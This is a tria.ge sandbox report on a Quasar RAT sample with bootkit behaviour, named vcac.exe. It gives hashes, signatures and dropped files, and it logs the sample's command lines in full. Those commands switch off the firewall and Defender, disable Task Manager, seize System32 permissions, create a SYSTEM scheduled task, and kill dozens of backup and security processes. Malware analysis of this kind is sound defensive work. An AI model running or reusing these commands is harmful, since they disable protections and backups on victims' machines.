Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

vcac.exe

windows7-x64

10

vcac.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    156s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 05:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    456917c4f5c2843f8dad38d227ecf0c2

  • SHA1

    de949b64553dd28524f6ae722a939541ada85f1f

  • SHA256

    2e724b4185329154ed2e90817cf2cb30e94c31803385d0d77d97a35bedeea057

  • SHA512

    8fe19aec29f4e1112374b6c1ebf354130cde6cf945fda0ba25a765bec1b031b0e3fcfcf7fbffff1d1e0432059bd668f1dc39770bbcef7345a3ddb4bdc69968a7

  • SSDEEP

    98304:IKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:p4xRBjgB7j4U6gl

Score
10/10
quasarbootkitdiscoveryevasionexploitpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    䬀䌀唀尀匀漀昀琀眀愀爀攀尀䴀椀挀爀漀猀漀昀琀尀圀椀渀搀漀眀猀尀䌀甀爀爀

  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 1 TTPs 5 IoCs
    evasion
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 42 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3812
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:4336
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:3848
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:2564
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:3876
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32 /grant "Admin:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2804
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentBrowser*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4508
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecDiveciMediaService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3488
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecJobEngine*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3584
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecManagementService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4952
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM vss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1632
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sql*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3236
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svc$*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM memtas*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5032
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4536
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM backup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1528
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxVss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2196
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxBlr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxFWD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4916
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCVD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4744
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCIMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2436
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM DefWatch*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ccEvtMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1984
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM SavRoam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5060
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM RTVscan*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2548
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBFCService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3028
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Intuit.QuickBooks.FCS*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3020
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooBackup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3712
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooIT*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3580
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM zhudongfangyu*
          3⤵
          • Kills process with taskkill
          PID:3516
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1728
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM stc_raw_agent*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3852
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VSNAPVSS*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBCFMonitorService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamTransportSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:216
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamDeploymentService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamNFSSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1880
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4692
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM PDVFSService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3588
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecVSSProvider*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3752
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentAccelerator*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3468
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecRPCService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1340
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcrSch2Svc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2896
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcronisAgent*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2804
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CASAD2DWebSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4864
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CAARCUpdateSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1524
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM TeamViewer*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          PID:3300
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set currentprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1496
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set domainprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:2596
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set privateprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1820
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set publicprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:2832
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
          3⤵
            PID:1304
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:4244
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
            3⤵
            • Modifies registry key
            PID:3916
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionExtension .exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1896
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3516

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2mywiyj.a2d.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll
        Filesize

        111KB

        MD5

        b59b0f6193bcc7e78a3b2fc730196be3

        SHA1

        045469fec2df2a9c75b550984a0ed32db2e9f846

        SHA256

        003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

        SHA512

        73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

        Download Submit

      • C:\Users\Admin\AppData\Roaming\boot.bin
        Filesize

        512B

        MD5

        2e3cbe988483f091081d287a7ad49a0a

        SHA1

        a521eb456c2100a75038e123e399a61edd7a682d

        SHA256

        26a63c9b4f4fe27e5f09267ad20f4517c22e0ee564725e1278f528839335c18a

        SHA512

        35bdfb59b2196471f5e321dd33417192054e7a0f380088ef10ba6e1c5888ddfb6cdc174dbe0bd06cf497dbad49a26551c1e9baa63bd6f16018b56162d420a9a2

        Download Submit

      • C:\Users\Admin\AppData\Roaming\lm.exe
        Filesize

        39KB

        MD5

        86e3192ad129a388e4f0ac864e84df78

        SHA1

        70a2b1422b583c2d768a6f816905bc85687ced52

        SHA256

        4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

        SHA512

        f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\lm.exe
        Filesize

        39KB

        MD5

        86e3192ad129a388e4f0ac864e84df78

        SHA1

        70a2b1422b583c2d768a6f816905bc85687ced52

        SHA256

        4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

        SHA512

        f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\mbr.exe
        Filesize

        101KB

        MD5

        00e306f18b8cc56f347f34a7ebaf7f9f

        SHA1

        2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

        SHA256

        ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

        SHA512

        2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\mbr.exe
        Filesize

        101KB

        MD5

        00e306f18b8cc56f347f34a7ebaf7f9f

        SHA1

        2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

        SHA256

        ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

        SHA512

        2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\mbr.exe
        Filesize

        101KB

        MD5

        00e306f18b8cc56f347f34a7ebaf7f9f

        SHA1

        2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

        SHA256

        ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

        SHA512

        2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\settings.bat
        Filesize

        67B

        MD5

        a204d9e5059a5449af7af765d371d6ea

        SHA1

        cfc6f78545bdc6a1c82491500f1bacfb38bef28c

        SHA256

        d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

        SHA512

        d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

        Download Submit

      • C:\Users\Admin\AppData\Roaming\svchost.exe
        Filesize

        41KB

        MD5

        84177654d8bbd32fe8132265e7a598ec

        SHA1

        73bbb239d1449b3af2d7f53614ba456c1add4c9a

        SHA256

        af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

        SHA512

        6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

        Download Submit

      • C:\Users\Admin\AppData\Roaming\svchost.exe
        Filesize

        41KB

        MD5

        84177654d8bbd32fe8132265e7a598ec

        SHA1

        73bbb239d1449b3af2d7f53614ba456c1add4c9a

        SHA256

        af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

        SHA512

        6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

        Download Submit

      • C:\Users\Admin\AppData\Roaming\svchost.exe
        Filesize

        41KB

        MD5

        84177654d8bbd32fe8132265e7a598ec

        SHA1

        73bbb239d1449b3af2d7f53614ba456c1add4c9a

        SHA256

        af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

        SHA512

        6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ucrtbased.dll
        Filesize

        1.4MB

        MD5

        ceeda0b23cdf173bf54f7841c8828b43

        SHA1

        1742f10b0c1d1281e5dec67a9f6659c8816738ad

        SHA256

        c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

        SHA512

        f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ucrtbased.dll
        Filesize

        1.4MB

        MD5

        ceeda0b23cdf173bf54f7841c8828b43

        SHA1

        1742f10b0c1d1281e5dec67a9f6659c8816738ad

        SHA256

        c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

        SHA512

        f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ucrtbased.dll
        Filesize

        1.4MB

        MD5

        ceeda0b23cdf173bf54f7841c8828b43

        SHA1

        1742f10b0c1d1281e5dec67a9f6659c8816738ad

        SHA256

        c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

        SHA512

        f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

        Download Submit

      • C:\Users\Admin\AppData\Roaming\vcruntime140d.dll
        Filesize

        111KB

        MD5

        b59b0f6193bcc7e78a3b2fc730196be3

        SHA1

        045469fec2df2a9c75b550984a0ed32db2e9f846

        SHA256

        003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

        SHA512

        73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

        Download Submit

      • memory/1896-123-0x00000000065F0000-0x0000000006622000-memory.dmp

        Filesize

        200KB

        Download

      • memory/1896-124-0x000000006E8F0000-0x000000006E93C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1896-147-0x0000000074770000-0x0000000074F20000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1896-144-0x0000000007620000-0x0000000007628000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1896-143-0x0000000007640000-0x000000000765A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1896-142-0x0000000007540000-0x0000000007554000-memory.dmp

        Filesize

        80KB

        Download

      • memory/1896-141-0x0000000007530000-0x000000000753E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-140-0x0000000007500000-0x0000000007511000-memory.dmp

        Filesize

        68KB

        Download

      • memory/1896-139-0x0000000007580000-0x0000000007616000-memory.dmp

        Filesize

        600KB

        Download

      • memory/1896-138-0x0000000007370000-0x000000000737A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1896-137-0x0000000007300000-0x000000000731A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1896-136-0x0000000007940000-0x0000000007FBA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1896-122-0x000000007FD60000-0x000000007FD70000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1896-135-0x0000000007010000-0x00000000070B3000-memory.dmp

        Filesize

        652KB

        Download

      • memory/1896-134-0x00000000065A0000-0x00000000065BE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1896-97-0x00000000029F0000-0x0000000002A26000-memory.dmp

        Filesize

        216KB

        Download

      • memory/1896-99-0x0000000005250000-0x0000000005878000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1896-98-0x0000000074770000-0x0000000074F20000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1896-121-0x0000000004C10000-0x0000000004C20000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1896-101-0x0000000004C10000-0x0000000004C20000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1896-116-0x0000000006540000-0x000000000658C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1896-109-0x00000000059A0000-0x0000000005A06000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1896-103-0x0000000005880000-0x00000000058E6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1896-102-0x0000000005000000-0x0000000005022000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1896-114-0x0000000005C20000-0x0000000005F74000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1896-115-0x0000000005FF0000-0x000000000600E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3024-45-0x0000000000400000-0x0000000000423000-memory.dmp

        Filesize

        140KB

        Download

      • memory/3812-92-0x000000000A700000-0x000000000A712000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3812-2-0x0000000007630000-0x0000000007BD4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3812-0-0x0000000074770000-0x0000000074F20000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3812-96-0x00000000073E0000-0x00000000073F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3812-6-0x00000000073E0000-0x00000000073F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3812-95-0x0000000074770000-0x0000000074F20000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3812-91-0x000000000A6D0000-0x000000000A6DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3812-1-0x0000000000F60000-0x000000000279C000-memory.dmp

        Filesize

        24.2MB

        Download

      • memory/3812-100-0x00000000073E0000-0x00000000073F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3812-3-0x0000000007180000-0x0000000007212000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3812-5-0x0000000007230000-0x000000000723A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3812-4-0x00000000073E0000-0x00000000073F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3848-26-0x0000000000CD0000-0x0000000000CF0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3848-16-0x0000000000CD0000-0x0000000000CF0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/4400-51-0x00007FFDD7320000-0x00007FFDD7DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4400-46-0x0000027D7B290000-0x0000027D7B2A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4400-120-0x00007FFDD7320000-0x00007FFDD7DE1000-memory.dmp

        Filesize

        10.8MB

        Download